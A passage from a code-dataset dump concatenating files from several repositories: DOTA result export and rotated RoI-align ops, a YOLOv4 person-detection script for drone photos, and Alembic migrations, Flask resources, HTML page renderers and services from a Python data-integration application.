bbox = rotated_box_to_poly_single(bbox[:5])
temp_txt = '{} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}\n'.format(
osp.splitext(img_names[img_id])[0], score, bbox[0], bbox[1], bbox[2], bbox[3], bbox[4], bbox[5], bbox[6], bbox[7])
f_out.write(temp_txt)
f_out.close()
return True
def result2dota_task2(results, dst_path, dataset):
CLASSES = dataset.CLASSES
img_names = dataset.img_names
if not osp.exists(dst_path):
os.mkdir(dst_path)
for classname in CLASSES:
f_out = open(osp.join(dst_path, 'Task2_'+classname+'.txt'), 'w')
print('Task2_'+classname+'.txt')
# per result represent one image
for img_id, result in enumerate(results):
filename = img_names[img_id]
filename = osp.basename(filename)
filename = osp.splitext(filename)[0]
for class_id, bboxes in enumerate(result):
if CLASSES[class_id] != classname:
continue
if(bboxes.size != 0):
for bbox in bboxes:
score = bbox[4]
temp_txt = '{} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}\n'.format(
filename, score, bbox[0], bbox[1], bbox[2], bbox[3])
f_out.write(temp_txt)
f_out.close()
return True
```
#### File: ops/roi_align_rotated/roi_align_rotated.py
```python
import torch
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from .roi_align_rotated_cuda import roi_align_rotated_forward, roi_align_rotated_backward
class _ROIAlignRotated(Function):
@staticmethod
def forward(ctx, input, roi, out_size, spatial_scale, sampling_ratio):
ctx.save_for_backward(roi)
ctx.out_size = out_size
ctx.spatial_scale = spatial_scale
ctx.sample_num = sampling_ratio
ctx.input_shape = input.size()
output = roi_align_rotated_forward(
input, roi, spatial_scale, out_size[0], out_size[1], sampling_ratio
)
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
(rois,) = ctx.saved_tensors
output_size = ctx.out_size
spatial_scale = ctx.spatial_scale
sampling_ratio = ctx.sample_num
bs, ch, h, w = ctx.input_shape
grad_input = roi_align_rotated_backward(
grad_output,
rois,
spatial_scale,
output_size[0],
output_size[1],
bs,
ch,
h,
w,
sampling_ratio,
)
return grad_input, None, None, None, None, None
roi_align_rotated = _ROIAlignRotated.apply
class RoIAlignRotated(nn.Module):
def __init__(self, out_size, spatial_scale, sample_num):
"""
Args:
out_size (tuple): h, w
spatial_scale (float): scale the input boxes by this number
sample_num (int): number of inputs samples to take for each output
sample. 0 to take samples densely.
Note:
roi_align_rotated supports continuous coordinate by default:
Given a continuous coordinate c, its two neighboring pixel indices (in our
pixel model) are computed by floor(c - 0.5) and ceil(c - 0.5). For example,
c=1.3 has pixel neighbors with discrete indices [0] and [1] (which are sampled
from the underlying signal at continuous coordinates 0.5 and 1.5).
"""
super(RoIAlignRotated, self).__init__()
self.out_size = _pair(out_size)
self.spatial_scale = spatial_scale
self.sample_num = sample_num
def forward(self, input, rois):
"""
Args:
input: NCHW images
rois: Bx6 boxes. First column is the index into N.
The other 5 columns are (x_ctr, y_ctr, width, height, angle_degrees).
"""
assert rois.dim() == 2 and rois.size(1) == 6
orig_dtype = input.dtype
if orig_dtype == torch.float16:
input = input.float()
rois = rois.float()
return roi_align_rotated(
input, rois, self.out_size, self.spatial_scale, self.sample_num
).to(dtype=orig_dtype)
def __repr__(self):
tmpstr = self.__class__.__name__ + "("
tmpstr += "out_size=" + str(self.out_size[0])
tmpstr += ", spatial_scale=" + str(self.spatial_scale)
tmpstr += ", sample_num=" + str(self.sample_num)
tmpstr += ")"
return tmpstr
```
|
{
"source": "jedichen121/tensorflow-yolov4-tflite",
"score": 2
}
|
#### File: jedichen121/tensorflow-yolov4-tflite/drone_image_detect.py
```python
import os
import cv2
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import numpy as np
import tensorflow as tf
import core.utils as utils
from PIL import Image
from core.yolov4 import YOLOv4, YOLOv3, YOLOv3_tiny, YOLOv4_tiny, decode
from core.yolov4 import filter_boxes
from core.config import cfg
from absl import app, flags, logging
from absl.flags import FLAGS
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import InteractiveSession
from tensorflow.python.saved_model import tag_constants
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
flags.DEFINE_string('framework', 'tf', '(tf, tflite, trt')
flags.DEFINE_string('weights', './checkpoints/yolov4-tiny-416',
'path to weights file')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_boolean('tiny', True, 'yolo or yolo-tiny')
flags.DEFINE_string('model', 'yolov4', 'yolov3 or yolov4')
flags.DEFINE_string('image', './data/kite.jpg', 'path to input image')
flags.DEFINE_string('output', 'result.png', 'path to output image')
flags.DEFINE_float('iou', 0.45, 'iou threshold')
flags.DEFINE_float('score', 0.25, 'score threshold')
def main(_argv):
config = ConfigProto()
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
STRIDES, ANCHORS, NUM_CLASS, XYSCALE = utils.load_config(FLAGS)
input_size = FLAGS.size
image_path = FLAGS.image
image_folder = "./data/aerial_photos/"
# Find all png files within the given directory, sorted numerically
image_files = []
file_names = os.listdir(image_folder)
saved_model_loaded = tf.saved_model.load(FLAGS.weights, tags=[tag_constants.SERVING])
infer = saved_model_loaded.signatures['serving_default']
for file in file_names:
if ".JPG" in file:
# image_files.append(os.path.join(image_folder, file))
image_files.append(file)
image_files.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))
for image in image_files[:]:
original_image = cv2.imread(os.path.join(image_folder, image))
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image_size = original_image.shape[:2]
image_data = cv2.resize(original_image, (input_size, input_size))
# image_data = utils.image_preprocess(np.copy(original_image), [input_size, input_size])
partial_image = original_image[int(original_image_size[0]/3):int(original_image_size[0]/3*2),
int(original_image_size[1]/3):int(original_image_size[1]/3*2), :]
# partial_image = original_image[int(original_image_size[0]/5*2):int(original_image_size[0]/5*3),
# int(original_image_size[1]/5*2):int(original_image_size[1]/5*3), :]
image_data = cv2.resize(partial_image, (input_size, input_size))
image_data = image_data / 255.
# image_data = image_data[np.newaxis, ...].astype(np.float32)
images_data = []
for i in range(1):
images_data.append(image_data)
images_data = np.asarray(images_data).astype(np.float32)
batch_data = tf.constant(images_data)
pred_bbox = infer(batch_data)
for key, value in pred_bbox.items():
boxes = value[:, :, 0:4]
pred_conf = value[:, :, 4:]
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),
scores=tf.reshape(
pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),
max_output_size_per_class=50,
max_total_size=50,
iou_threshold=FLAGS.iou,
score_threshold=FLAGS.score
)
pred_bbox = [boxes.numpy(), scores.numpy(), classes.numpy(), valid_detections.numpy()]
# image = utils.draw_bbox(original_image, pred_bbox)
detect_person = False
_, out_scores, out_classes, num_boxes = pred_bbox
# print("num_boxes is ", num_boxes)
# print("out_class is ", out_classes)
for i in range(num_boxes[0]):
class_id = int(out_classes[0][i])
# print(class_id)
if class_id == 0:
detect_person = True
print('%s: %.2f' % (image, out_scores[0][i]))
break
if not detect_person:
print('%s: %.2f' % (image, 0))
# image = utils.draw_bbox(image_data*255, pred_bbox)
# image = Image.fromarray(image.astype(np.uint8))
# image.show()
# image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)
# cv2.imwrite(FLAGS.output, image)
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
```
|
{
"source": "jedicontributors/pythondataintegrator",
"score": 2
}
|
#### File: alembic/versions/d0e0fa244e63_connection_queue.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd0e0fa244e63'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def insert_connection_types():
from models.dao.connection.ConnectionType import ConnectionType
from models.dao.connection.ConnectorType import ConnectorType
bind = op.get_bind()
from sqlalchemy import orm
session = orm.Session(bind=bind)
connection_type_list = [
{
"Name": "Queue",
}
]
connector_type_list = [
{
"ConnectionType": "Queue",
"Name": "Kafka",
}
]
connection_types = []
for connection_type_json in connection_type_list:
connection_type = ConnectionType(Name=connection_type_json["Name"])
connection_types.append(connection_type)
session.bulk_save_objects(connection_types)
session.commit()
connector_types = []
for connector_type_json in connector_type_list:
connection_type = session.query(ConnectionType).filter_by(Name=connector_type_json["ConnectionType"]).first()
connector_type = ConnectorType(Name=connector_type_json["Name"], ConnectionTypeId=connection_type.Id)
connector_types.append(connector_type)
session.bulk_save_objects(connector_types)
session.commit()
def insert_connection_server():
from models.dao.connection import Connection,ConnectionServer
bind = op.get_bind()
from sqlalchemy import orm
session = orm.Session(bind=bind)
query = bind.execute('select dic."ConnectionId", dic."Host",dic."Port" from "Connection"."ConnectionDatabase" as dic')
results = query.fetchall()
for connection_database in results:
connection = session.query(Connection).filter_by(Id=connection_database[0]).first()
connection_server = ConnectionServer(Connection=connection,
Host=connection_database[1],
Port=connection_database[2])
session.add(connection_server)
session.commit()
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('ConnectionQueue',
sa.Column('Id', sa.Integer(), nullable=False),
sa.Column('ConnectionId', sa.Integer(), nullable=True),
sa.Column('ConnectorTypeId', sa.Integer(), nullable=True),
sa.Column('Protocol', sa.String(length=100), nullable=True),
sa.Column('Mechanism', sa.String(length=100), nullable=True),
sa.Column('CreatedByUserId', sa.Integer(), nullable=False),
sa.Column('CreationDate', sa.DateTime(), nullable=False),
sa.Column('LastUpdatedUserId', sa.Integer(), nullable=True),
sa.Column('LastUpdatedDate', sa.DateTime(), nullable=True),
sa.Column('IsDeleted', sa.Integer(), nullable=False),
sa.Column('Comments', sa.String(length=1000), nullable=True),
sa.Column('RowVersion', sa.TIMESTAMP(), nullable=True),
sa.ForeignKeyConstraint(['ConnectionId'], ['Connection.Connection.Id'], ),
sa.ForeignKeyConstraint(['ConnectorTypeId'], ['Connection.ConnectorType.Id'], ),
sa.PrimaryKeyConstraint('Id'),
schema='Connection'
)
op.create_table('ConnectionServer',
sa.Column('Id', sa.Integer(), nullable=False),
sa.Column('ConnectionId', sa.Integer(), nullable=True),
sa.Column('Host', sa.String(length=100), nullable=True),
sa.Column('Port', sa.Integer(), nullable=True),
sa.Column('CreatedByUserId', sa.Integer(), nullable=False),
sa.Column('CreationDate', sa.DateTime(), nullable=False),
sa.Column('LastUpdatedUserId', sa.Integer(), nullable=True),
sa.Column('LastUpdatedDate', sa.DateTime(), nullable=True),
sa.Column('IsDeleted', sa.Integer(), nullable=False),
sa.Column('Comments', sa.String(length=1000), nullable=True),
sa.Column('RowVersion', sa.TIMESTAMP(), nullable=True),
sa.ForeignKeyConstraint(['ConnectionId'], ['Connection.Connection.Id'], ),
sa.PrimaryKeyConstraint('Id'),
schema='Connection'
)
insert_connection_server()
op.drop_column('ConnectionDatabase', 'Host', schema='Connection')
op.drop_column('ConnectionDatabase', 'Port', schema='Connection')
op.drop_column('ConnectionFile', 'Host', schema='Connection')
op.drop_column('ConnectionFile', 'Port', schema='Connection')
insert_connection_types()
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('ConnectionFile', sa.Column('Port', sa.INTEGER(), autoincrement=False, nullable=True), schema='Connection')
op.add_column('ConnectionFile', sa.Column('Host', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Connection')
op.add_column('ConnectionDatabase', sa.Column('Port', sa.INTEGER(), autoincrement=False, nullable=True), schema='Connection')
op.add_column('ConnectionDatabase', sa.Column('Host', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Connection')
op.drop_table('ConnectionServer', schema='Connection')
op.drop_table('ConnectionQueue', schema='Connection')
# ### end Alembic commands ###
```
#### File: alembic/versions/e50ccd73d9c9_data_integration_connections.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def insert_data_integration_connection_to_database():
from models.dao.integration import DataIntegrationConnection,DataIntegrationConnectionDatabase
bind = op.get_bind()
from sqlalchemy import orm
session = orm.Session(bind=bind)
query = bind.execute('select dic."Id", dic."Schema",dic."TableName",dic."Query" from "Integration"."DataIntegrationConnection" as dic')
results = query.fetchall()
for data_integration_connection_data in results:
data_integration_connection = session.query(DataIntegrationConnection).filter_by(Id=data_integration_connection_data[0]).first()
data_integration_connection_database = DataIntegrationConnectionDatabase(DataIntegrationConnection=data_integration_connection,
Schema=data_integration_connection_data[1],
TableName=data_integration_connection_data[2],
Query=data_integration_connection_data[3])
session.add(data_integration_connection_database)
session.commit()
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('DataIntegrationConnectionDatabase',
sa.Column('Id', sa.Integer(), nullable=False),
sa.Column('DataIntegrationConnectionId', sa.Integer(), nullable=True),
sa.Column('Schema', sa.String(length=100), nullable=True),
sa.Column('TableName', sa.String(length=100), nullable=True),
sa.Column('Query', sa.Text(), nullable=True),
sa.Column('CreatedByUserId', sa.Integer(), nullable=False),
sa.Column('CreationDate', sa.DateTime(), nullable=False),
sa.Column('LastUpdatedUserId', sa.Integer(), nullable=True),
sa.Column('LastUpdatedDate', sa.DateTime(), nullable=True),
sa.Column('IsDeleted', sa.Integer(), nullable=False),
sa.Column('Comments', sa.String(length=1000), nullable=True),
sa.Column('RowVersion', sa.TIMESTAMP(), nullable=True),
sa.ForeignKeyConstraint(['DataIntegrationConnectionId'], ['Integration.DataIntegrationConnection.Id'], ),
sa.PrimaryKeyConstraint('Id'),
schema='Integration'
)
insert_data_integration_connection_to_database()
op.drop_column('DataIntegrationConnection', 'TableName', schema='Integration')
op.drop_column('DataIntegrationConnection', 'Schema', schema='Integration')
op.drop_column('DataIntegrationConnection', 'Query', schema='Integration')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('DataIntegrationConnection', sa.Column('Query', sa.TEXT(), autoincrement=False, nullable=True), schema='Integration')
op.add_column('DataIntegrationConnection', sa.Column('Schema', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Integration')
op.add_column('DataIntegrationConnection', sa.Column('TableName', sa.VARCHAR(length=100), autoincrement=False, nullable=True), schema='Integration')
op.drop_table('DataIntegrationConnectionDatabase', schema='Integration')
# ### end Alembic commands ###
```
#### File: controllers/operation/DataOperationResource.py
```python
import json
from infrastructor.json.JsonConvert import JsonConvert
from injector import inject
from controllers.common.models.CommonModels import CommonModels
from controllers.operation.models.DataOperationModels import DataOperationModels
from domain.operation.services.DataOperationService import DataOperationService
from IocManager import IocManager
from infrastructor.api.ResourceBase import ResourceBase
from models.viewmodels.operation.CreateDataOperationModel import CreateDataOperationModel
@DataOperationModels.ns.route("")
class DataOperationResource(ResourceBase):
@inject
def __init__(self, data_operation_service: DataOperationService,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.data_operation_service = data_operation_service
@DataOperationModels.ns.marshal_with(CommonModels.SuccessModel)
def get(self):
"""
Get All Data Operations
"""
entities = self.data_operation_service.get_data_operations()
result = DataOperationModels.get_data_operation_result_models(entities)
return CommonModels.get_response(result=result)
@DataOperationModels.ns.expect(DataOperationModels.create_data_operation_model, validate=True)
@DataOperationModels.ns.marshal_with(CommonModels.SuccessModel)
def post(self):
"""
Data Operation definition
"""
data: CreateDataOperationModel = JsonConvert.FromJSON(json.dumps(IocManager.api.payload))
creation_result = self.data_operation_service.post_data_operation(
data_operation_model=data,
definition_json=JsonConvert.ToJSON(data))
result = DataOperationModels.get_data_operation_result_model(creation_result)
return CommonModels.get_response(result=result)
@DataOperationModels.ns.expect(DataOperationModels.delete_data_operation_model, validate=True)
@DataOperationModels.ns.marshal_with(CommonModels.SuccessModel)
def delete(self):
"""
Delete Existing Data Operation
"""
data = IocManager.api.payload
id = data.get('Id') #
deletion_result = self.data_operation_service.delete_data_operation(id)
return CommonModels.get_response(message="Data Operation removed successfully")
```
#### File: operation/page/DataOperationJobExecutionPage.py
```python
from injector import inject
from sqlalchemy import func
from domain.page.HtmlTemplateService import HtmlTemplateService, Pagination
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.dependency.scopes import IScoped
from models.dao.operation import DataOperationJob, DataOperationJobExecution, \
DataOperationJobExecutionIntegration, DataOperationJobExecutionIntegrationEvent
class DataOperationJobExecutionPage(IScoped):
@inject
def __init__(self, repository_provider: RepositoryProvider, html_template_service: HtmlTemplateService):
super().__init__()
self.repository_provider = repository_provider
self.html_template_service = html_template_service
def render_job_execution(self, pagination):
headers = [
{'value': 'Execution Id'},
{'value': 'Job Id'},
{'value': 'Name'},
{'value': 'Schedule Info'},
{'value': 'Status'},
{'value': 'Log'},
{'value': 'Source Data Count'},
{'value': 'Affected Row Count'},
{'value': 'Execution Start Date'},
{'value': 'Execution End Date'}
]
def prepare_row(data: DataOperationJobExecution):
max_id = self.repository_provider.database_session_manager.session.query(
func.max(DataOperationJobExecutionIntegration.Id)) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data.Id)
error_integration = self.repository_provider.get(DataOperationJobExecutionIntegration).first(Id=max_id)
error_log = ''
if error_integration is not None and error_integration.Log is not None:
error_log = error_integration.Log.replace('\n', '<br />').replace('\t',
' ')
total_source_data_count = self.repository_provider.database_session_manager.session.query(
func.sum(DataOperationJobExecutionIntegration.SourceDataCount).label("SourceDataCount")) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data.Id).first()[0]
if total_source_data_count is None or total_source_data_count < 0:
total_source_data_count = 0
total_affected_row = self.repository_provider.database_session_manager.session.query(
func.sum(DataOperationJobExecutionIntegrationEvent.AffectedRowCount).label("AffectedRowCount")) \
.join(DataOperationJobExecutionIntegration.DataOperationJobExecutionIntegrationEvents) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data.Id).first()[0]
if total_affected_row is None or total_affected_row < 0:
total_affected_row = 0
end_date = ''
if data.EndDate is not None:
end_date = data.EndDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3]
row = {
'data':
[
{'value': f'<a href="/DataOperation/Job/Execution/{data.Id}">{data.Id}</a>-<a href="/DataOperation/Job/Execution/Log/{data.Id}">log</a>'},
{
'value': f'<a href="/DataOperation/Job/{data.DataOperationJob.Id}">{data.DataOperationJob.Id}</a>'},
{
'value': f'<a href="/DataOperation/{data.DataOperationJob.DataOperation.Id}">{data.DataOperationJob.DataOperation.Name}({data.DataOperationJob.DataOperation.Id})</a>'},
{
'value': f'{data.DataOperationJob.Cron}({data.DataOperationJob.StartDate}-{data.DataOperationJob.EndDate})'},
{'value': data.Status.Description},
{'value': error_log},
{'value': total_source_data_count},
{'value': total_affected_row},
{'value': data.StartDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'},
{'value': end_date,
'class': 'mail-row-nowrap'}
]
}
return row
data_operation_job_execution_repository = self.repository_provider.get(DataOperationJobExecution)
query = data_operation_job_execution_repository.table
pagination.PageUrl = '/DataOperation/Job/Execution{}'
table_data = self.html_template_service.prepare_table_data_dynamic(query=query,
headers=headers,
prepare_row=prepare_row,
sortable='"Id" desc',
pagination=pagination)
table = self.html_template_service.render_table(source=table_data)
return table
def render(self, pagination: Pagination):
if pagination is None:
pagination = Pagination(Limit=50)
elif pagination.Limit is None:
pagination.Limit = 50
table_job = self.render_job_execution(pagination)
return self.html_template_service.render_html(
content=f''' <div style="font-size: 24px;"><b>Job Executions </b></div>{table_job}''')
```
#### File: operation/page/DataOperationJobPage.py
```python
import json
from injector import inject
from domain.page.HtmlTemplateService import HtmlTemplateService, Pagination
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.dependency.scopes import IScoped
from models.dao.operation import DataOperationJob, DataOperation
class DataOperationJobPage(IScoped):
@inject
def __init__(self, repository_provider: RepositoryProvider, html_template_service: HtmlTemplateService):
super().__init__()
self.repository_provider = repository_provider
self.html_template_service = html_template_service
def render_job(self, pagination):
headers = [
{'value': 'Id'},
{'value': 'JobId'},
{'value': 'Name'},
{'value': 'Contacts'},
{'value': 'Next Run Time'},
{'value': 'Cron'},
{'value': 'Start Date'},
{'value': 'End Date'},
{'value': 'Creation Date'},
{'value': 'Last Update Date'},
{'value': 'Is Deleted'},
{'value': 'Definition'}
]
def prepare_row(data):
data_operation_job = data.DataOperationJob
last_update_date = None
if data_operation_job.LastUpdatedDate is not None:
last_update_date = data_operation_job.LastUpdatedDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3]
next_run_time = '-'
if data_operation_job.ApSchedulerJob is not None and data_operation_job.ApSchedulerJob.NextRunTime is not None:
next_run_time = data_operation_job.ApSchedulerJob.NextRunTime
contacts=[]
if data_operation_job.DataOperation.Contacts is not None and len(data_operation_job.DataOperation.Contacts)>0:
for contact in data_operation_job.DataOperation.Contacts:
contacts.append(contact.Email)
contact_str=';'.join(contacts)
op_def=''
if data_operation_job.Cron is not None:
definition={
"OperationName":data_operation_job.DataOperation.Name,
"Cron":data_operation_job.Cron
}
# else:
# definition={
# "OperationName":data_operation_job.DataOperation.Name,
# "RunDate":data_operation_job.StartDate
# }
op_def=json.dumps(definition,indent=4)
row = {
"data": [
{'value': f'<a href="/DataOperation/Job/{data_operation_job.Id}">{data_operation_job.Id}</a>'},
{'value': data_operation_job.ApSchedulerJobId},
{
'value': f'<a href="/DataOperation/{data_operation_job.DataOperation.Id}">{data_operation_job.DataOperation.Name}({data_operation_job.DataOperation.Id})</a>'},
{'value': contact_str},
{'value': next_run_time},
{'value': data_operation_job.Cron},
{'value': data_operation_job.StartDate},
{'value': data_operation_job.EndDate},
{'value': data_operation_job.CreationDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'row-nowrap'},
{'value': last_update_date, 'class': 'row-nowrap'},
{'value': data_operation_job.IsDeleted},
{'value': f'''{op_def}'''},
]
}
return row
data_operation_repository = self.repository_provider.get(DataOperationJob)
query = data_operation_repository.database_session_manager.session.query(DataOperationJob,
DataOperation.Name).join(
DataOperationJob.DataOperation)
if pagination.Filter is not None and pagination.Filter != '':
if pagination.Filter == '0':
query = query.filter(DataOperationJob.Cron != None)
query = query.filter(DataOperationJob.IsDeleted == 0)
elif pagination.Filter == '1':
query = query.filter(DataOperationJob.Cron != None)
elif pagination.Filter == '2':
query = query.filter(DataOperationJob.IsDeleted == 0)
else:
query = query.filter(DataOperation.Name.ilike(f'%{pagination.Filter}%'))
# job_execution_integrations = job_execution_integrations_query.all()
pagination.PageUrl = '/DataOperation/Job{}'
table_data = self.html_template_service.prepare_table_data_dynamic(query=query,
headers=headers,
prepare_row=prepare_row,
sortable='"DataOperationJob"."Id" desc',
pagination=pagination)
table = self.html_template_service.render_table(source=table_data)
return table
def render(self, pagination: Pagination):
if pagination is None:
pagination = Pagination(Limit=50)
elif pagination.Limit is None:
pagination.Limit = 50
table_job = self.render_job(pagination)
return self.html_template_service.render_html(
content=f''' <div style="font-size: 24px;"><b>Jobs </b></div>{table_job}''')
```
#### File: operation/services/DataOperationJobExecutionIntegrationService.py
```python
from datetime import datetime
from injector import inject
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.dependency.scopes import IScoped
from models.dao.common import OperationEvent
from models.dao.common.Status import Status
from models.dao.operation import DataOperationJobExecution, DataOperationJobExecutionIntegration, \
DataOperationJobExecutionIntegrationEvent, DataOperationIntegration
from models.enums.events import EVENT_EXECUTION_INTEGRATION_INITIALIZED
class DataOperationJobExecutionIntegrationService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
):
self.database_session_manager = database_session_manager
self.data_operation_job_execution_repository: Repository[DataOperationJobExecution] = Repository[
DataOperationJobExecution](database_session_manager)
self.status_repository: Repository[Status] = Repository[Status](database_session_manager)
self.operation_event_repository: Repository[OperationEvent] = Repository[
OperationEvent](database_session_manager)
self.data_operation_job_execution_integration_repository: Repository[DataOperationJobExecutionIntegration] = \
Repository[
DataOperationJobExecutionIntegration](database_session_manager)
self.data_operation_job_execution_integration_event_repository: Repository[
DataOperationJobExecutionIntegrationEvent] = Repository[
DataOperationJobExecutionIntegrationEvent](database_session_manager)
def create(self, data_operation_job_execution_id,
data_operation_integration: DataOperationIntegration):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
status = self.status_repository.first(Id=1)
data_operation_job_execution_integration = DataOperationJobExecutionIntegration(
DataOperationJobExecution=data_operation_job_execution,
DataOperationIntegration=data_operation_integration,
Status=status,
Limit=data_operation_integration.Limit,
ProcessCount=data_operation_integration.ProcessCount)
self.data_operation_job_execution_integration_repository.insert(data_operation_job_execution_integration)
operation_event = self.operation_event_repository.first(Code=EVENT_EXECUTION_INTEGRATION_INITIALIZED)
data_operation_job_execution_integration_event = DataOperationJobExecutionIntegrationEvent(
EventDate=datetime.now(),
DataOperationJobExecutionIntegration=data_operation_job_execution_integration,
Event=operation_event)
self.data_operation_job_execution_integration_event_repository.insert(
data_operation_job_execution_integration_event)
self.database_session_manager.commit()
return data_operation_job_execution_integration
def update_status(self,
data_operation_job_execution_integration_id: int = None,
status_id: int = None, is_finished: bool = False):
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_job_execution_integration_id)
status = self.status_repository.first(Id=status_id)
if is_finished:
data_operation_job_execution_integration.EndDate = datetime.now()
data_operation_job_execution_integration.Status = status
self.database_session_manager.commit()
return data_operation_job_execution_integration
def update_source_data_count(self,
data_operation_job_execution_integration_id: int = None,
source_data_count=None):
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_job_execution_integration_id)
data_operation_job_execution_integration.SourceDataCount = source_data_count
self.database_session_manager.commit()
return data_operation_job_execution_integration
def update_log(self,
data_operation_job_execution_integration_id: int = None,
log=None):
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_job_execution_integration_id)
data_operation_job_execution_integration.Log = log[0:1000]
self.database_session_manager.commit()
return data_operation_job_execution_integration
def create_event(self, data_operation_execution_integration_id,
event_code,
affected_row=None) -> DataOperationJobExecutionIntegrationEvent:
data_operation_job_execution_integration = self.data_operation_job_execution_integration_repository.first(
Id=data_operation_execution_integration_id)
operation_event = self.operation_event_repository.first(Code=event_code)
data_operation_job_execution_integration_event = DataOperationJobExecutionIntegrationEvent(
EventDate=datetime.now(),
AffectedRowCount=affected_row,
DataOperationJobExecutionIntegration=data_operation_job_execution_integration,
Event=operation_event)
self.data_operation_job_execution_integration_event_repository.insert(
data_operation_job_execution_integration_event)
self.database_session_manager.commit()
return data_operation_job_execution_integration
```
#### File: unittests/delivery/test_mail_sending.py
```python
from unittest import TestCase
from IocManager import IocManager
from infrastructor.delivery.EmailProvider import EmailProvider
class TestMailSending(TestCase):
def __init__(self, method_name='TestMailSending'):
super(TestMailSending, self).__init__(method_name)
from infrastructor.api.FlaskAppWrapper import FlaskAppWrapper
os.environ["PYTHON_ENVIRONMENT"] = 'test'
IocManager.set_app_wrapper(app_wrapper=FlaskAppWrapper)
IocManager.initialize()
self.client = IocManager.app.test_client()
def print_error_detail(self, data):
print(data['message'] if 'message' in data else '')
print(data['traceback'] if 'traceback' in data else '')
print(data['message'] if 'message' in data else '')
def test_get_data_count(self):
email_provider = IocManager.injector.get(EmailProvider)
email_provider.send(["<EMAIL>"],"test","test")
```
#### File: connection/services/ConnectionDatabaseService.py
```python
from injector import inject
from domain.connection.services.ConnectorTypeService import ConnectorTypeService
from infrastructor.cryptography.CryptoService import CryptoService
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.dependency.scopes import IScoped
from infrastructor.exceptions.OperationalException import OperationalException
from models.dao.connection.Connection import Connection
from models.dao.connection.ConnectionDatabase import ConnectionDatabase
from models.viewmodels.connection.CreateConnectionDatabaseModel import CreateConnectionDatabaseModel
class ConnectionDatabaseService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
connector_type_service: ConnectorTypeService
):
self.connector_type_service = connector_type_service
self.database_session_manager = database_session_manager
self.connection_database_repository: Repository[ConnectionDatabase] = Repository[ConnectionDatabase](
database_session_manager)
def create(self, connection: Connection, model: CreateConnectionDatabaseModel) -> ConnectionDatabase:
"""
Create Database connection
"""
connector_type = self.connector_type_service.get_by_name(name=model.ConnectorTypeName)
if connector_type is None:
raise OperationalException(f"{model.ConnectorTypeName} not found")
if connector_type.ConnectionTypeId != connection.ConnectionTypeId:
raise OperationalException(f"{model.ConnectorTypeName} incompatible with {connection.ConnectionType.Name}")
connection_database = ConnectionDatabase(Connection=connection,
ConnectorType=connector_type,
Sid=model.Sid,
ServiceName=model.ServiceName,
DatabaseName=model.DatabaseName)
self.connection_database_repository.insert(connection_database)
return connection_database
def update(self, connection: Connection, model: CreateConnectionDatabaseModel) -> ConnectionDatabase:
"""
Update Database connection
"""
connection_database = self.connection_database_repository.first(ConnectionId=connection.Id)
connector_type = self.connector_type_service.get_by_name(name=model.ConnectorTypeName)
if connector_type is None:
raise OperationalException(f"{model.ConnectorTypeName} not found")
if connector_type.ConnectionTypeId != connection.ConnectionTypeId:
raise OperationalException(f"{model.ConnectorTypeName} incompatible with {connection.ConnectionType.Name}")
connection_database.ConnectorType = connector_type
connection_database.Sid = model.Sid
connection_database.ServiceName = model.ServiceName
connection_database.DatabaseName = model.DatabaseName
return connection_database
def delete(self, id: int):
"""
Delete Database connection
"""
self.connection_database_repository.delete_by_id(id)
```
#### File: domain/delivery/EmailService.py
```python
from datetime import datetime
from typing import List
from injector import inject
